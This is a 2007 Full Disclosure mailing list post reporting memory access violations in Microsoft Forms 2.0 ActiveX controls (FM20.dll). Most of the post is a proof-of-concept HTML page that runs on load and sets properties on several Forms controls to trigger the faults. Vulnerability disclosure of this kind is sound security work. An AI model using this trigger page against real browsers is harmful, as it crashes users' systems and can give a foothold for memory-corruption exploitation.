Full Disclosure mailing list archives
Microsoft Forms 2.0 Controls Multiple Memory Access Violations
From: Elazar Broad <elazarb () earthlink net>
Date: Mon, 12 Nov 2007 16:07:22 -0500 (GMT-05:00)
There are multiple memory access violations in the Microsoft Forms 2.0 Controls(FM20.dll). PoC as follows: ------------------------ <!-- written by e.b. --> <!-- Written by e.b. --> <html> <head> <script language="JavaScript" DEFER> function Check() { var obj; //Forms.Checkbox.1 obj = new ActiveXObject("Forms.Checkbox.1"); obj.Caption = "A"; obj.GroupName = "A"; obj.Accelerator = "A"; //Forms.OptionButton.1 obj = new ActiveXObject("Forms.OptionButton.1"); obj.Caption = "A"; obj.GroupName = "A"; obj.Accelerator = "A"; //Forms.ToggleButton.1 obj = new ActiveXObject("Forms.ToggleButton.1"); obj.Caption = "A"; obj.GroupName = "A"; obj.Accelerator = "A"; //Forms.ComboBox.1 obj = new ActiveXObject("Forms.ComboBox.1"); obj.Text = "A"; obj.Value = "A"; //Forms.TextBox.1 obj = new ActiveXObject("Forms.Textbox.1"); obj.Text = "A"; obj.Value = "A"; obj.SelStart = 1; } </script> </head> <body onLoad="JavaScript: return Check();" /> </html> ------------------------ There may be more. Elazar _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Microsoft Forms 2.0 Controls Multiple Memory Access Violations Elazar Broad (Nov 12)